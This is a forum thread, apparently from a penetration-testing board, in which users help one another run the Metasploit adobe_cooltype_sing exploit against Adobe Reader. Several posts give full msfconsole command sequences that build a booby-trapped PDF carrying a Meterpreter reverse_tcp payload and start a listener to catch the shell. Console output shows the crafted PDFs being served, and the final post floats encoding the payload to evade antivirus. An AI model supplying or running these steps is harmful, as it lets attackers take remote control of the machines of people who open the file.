
Thread: adobe_cooltype_sing

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default adobe_cooltype_sing

    Hi all, I have just seen this exploit write-up and would like to know how to add it to Metasploit to try out. In what directory would I place the file, as a search adobe_cooltype_sing does not show up and I believe I will have to place it manually? I have the rb file.

    Also, since I did the -apt-get upgrade for the new harvester update I can't seem to update msf, but was able to before using set...

    Thanks
    Last edited by pentest09; 09-10-2010 at 03:38 PM.

  2. #2
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: adobe_cooltype_sing

    For a write up on the adobe_cooltype_sing you can have a look at ;
    New Adobe 0day Demonstration | Attack Vector

    Further, regarding updating msf, open msfconsole and then msfupdate;
    Code:
    msfconsole
    msfupdate

    edit
    -----
    edited as moved from original location where posted/
    Last edited by TAPE; 09-10-2010 at 09:38 PM.

  3. #3
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    Thanks, will try it. Just reverted back to snapshot before -upgrade and set updated it fine, so think it was the upgrade broke the app, and yeah, found the write-up on Attack Vector.

    thanks for quick reply

  4. #4

    Default Re: adobe_cooltype_sing

    Quote Originally Posted by TAPE
    Not the place for questions, this is a place for explanations on how things are done..

    For a write up on the adobe_cooltype_sing you can have a look at ;
    New Adobe 0day Demonstration | Attack Vector

    Further, regarding updating msf, open msfconsole and then msfupdate;
    Code:
    msfconsole
    msfupdate

    ..after update
    Code:
    msfconsole
    use  exploit/windows/fileformat/adobe_cooltype_sing
    set OUTPUTPATH /tmp/test_adobe.pdf
    set LHOST x.x.x.x
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit
    use exploit/multi/handler
    set LHOST x.x.x.x
    set PAYLOAD windows/meterpreter/reverse_tcp
    set ExitOnSession false
    exploit -j
    Note: I start explicitly the session handler, because it's not properly started with the fileformat exploit

    copy /tmp/test_adobe.pdf onto your windows box & execute....watch msf3 console ;-)
    especially be surprised if you use latest adobe 9.3.4!

    ...exploit is not working on my XP3 with adobe 9.3.4 (enable/disable JS) box - adobe crashes...didn't have time yet to analyze...

    /brtw2003
    Last edited by brtw2003; 09-10-2010 at 04:57 PM.

  5. #5
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    Hi again, just run the exploit and it gives me a URL instead of creating the PDF file. Here's the output, what's wrong?

    msf > use windows/browser/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set filename test.pdf
    filename => test.pdf
    msf exploit(adobe_cooltype_sing) > set outputpath /tmp
    outputpath => /tmp
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(adobe_cooltype_sing) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.0.8:4444
    [*] Using URL: http://0.0.0.0:8080/wcTXIWj
    [*] Local IP: http://192.168.0.8:8080/wcTXIWj
    [*] Server started.
    msf exploit(adobe_cooltype_sing) >
    [*] Sending crafted PDF to 192.168.0.5:52492
    [-] Exception handling request: Connection reset by peer (that's me running it again in ie8)
    [*] Sending crafted PDF to 192.168.0.5:52498
    [*] Sending crafted PDF to 192.168.0.5:52500

    just hangs....

    please advise...

  6. #6
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: adobe_cooltype_sing

    pentest09 - I suggest you re-read brtw2003's post, particularly the step-by-step example he gave and the explicit note:

    Quote Originally Posted by brtw2003
    Note: I start explicitly the session handler, because it's not properly started with the fileformat exploit
    Research a little bit, study the on-line guides for Metasploit and try a few things out. But brtw2003 has pretty much laid it out there for you.

    Btw - I just confirmed through my own testing that this particular exploit does in fact work on Windows XP SP3, Windows Vista and Windows 7, all with the latest Reader v9.3.4.
    Last edited by hypervista; 09-10-2010 at 07:39 PM. Reason: clarifying language

  7. #7
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default

    My fault, rushing, sorry. So when the multi/handler is run it should create my PDF and set up the session correctly? I thought that the first part would create the PDF even before the problem with the handling of the reverse connection.

    Will try thanks for your response..

    just tried it and got this:

    msf > use exploit/windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
    OUTPUTPATH => /tmp/test_adobe.pdf
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_cooltype_sing) > exploit
    [*] Started reverse handler on 192.168.0.8:4444
    [*] Creating 'msf.pdf' file...
    [-] Exploit exception: No such file or directory - /tmp/test_adobe.pdf/msf.pdf (so do I need a PDF in the first place to embed the exploit code into?)
    [*] Exploit completed, but no session was created.
    msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
    msf exploit(handler) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.

    It's the file creation that's the problem
    Last edited by Archangel-Amael; 09-10-2010 at 09:40 PM.

  8. #8
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: adobe_cooltype_sing

    Why won't you pay attention ?

    You typed:
    Code:
    msf > use exploit/windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
    OUTPUTPATH => /tmp/test_adobe.pdf
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    The outputpath is only where to put the .pdf; if you want to give it a name, change filename.
    The correct command:
    Code:
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  9. #9
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    OK lads, got it. In the first write-up it showed set output path; I use set filename and it worked. Thanks again. ESET picked it up on Win 7 anyway.

    cheers

  10. #10
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: adobe_cooltype_sing

    Will have to have a look when I get a moment, but isn't there a way to output to raw data and encode before creating the PDF?

    That might help AV detection evasion.
